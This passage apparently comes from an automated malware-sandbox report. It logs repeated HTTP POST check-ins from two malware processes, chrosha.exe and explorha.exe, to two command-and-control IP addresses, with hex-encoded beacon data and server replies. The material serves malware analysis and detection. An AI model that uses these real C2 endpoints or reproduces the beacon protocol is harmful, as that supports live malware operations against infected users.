                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:10.612126112 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1132 | 192.168.2.5 | 50986 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:10.849131107 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:11.102238894 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1133 | 192.168.2.5 | 50987 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:10.966979980 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:11.214252949 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1134 | 192.168.2.5 | 50988 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:11.465202093 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:11.713751078 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1135 | 192.168.2.5 | 50989 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:11.465207100 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:11.714739084 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1136 | 192.168.2.5 | 50990 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:11.966552019 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:12.215764046 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1137 | 192.168.2.5 | 50991 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:12.071188927 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:12.319031000 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1138 | 192.168.2.5 | 50992 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:12.567848921 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:12.826281071 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1139 | 192.168.2.5 | 50993 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:12.573442936 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:12.828583002 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1140 | 192.168.2.5 | 50994 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:13.079648972 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:13.330490112 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1141 | 192.168.2.5 | 50995 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:13.181581020 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:13.428740978 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1142 | 192.168.2.5 | 50996 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:13.681881905 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:13.931174040 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1143 | 192.168.2.5 | 50997 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:13.695239067 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:13.946455002 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1144 | 192.168.2.5 | 50998 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:14.202203035 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:14.456444025 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1145 | 192.168.2.5 | 50999 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:14.292876959 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:14.543880939 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1146 | 192.168.2.5 | 51000 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:14.795607090 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:15.046539068 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1147 | 192.168.2.5 | 51001 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:14.823648930 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:15.071965933 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1148 | 192.168.2.5 | 51002 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:15.323409081 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:15.573204994 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1149 | 192.168.2.5 | 51003 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:15.396133900 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:15.640647888 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1150 | 192.168.2.5 | 51004 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:15.888179064 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:16.135715961 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
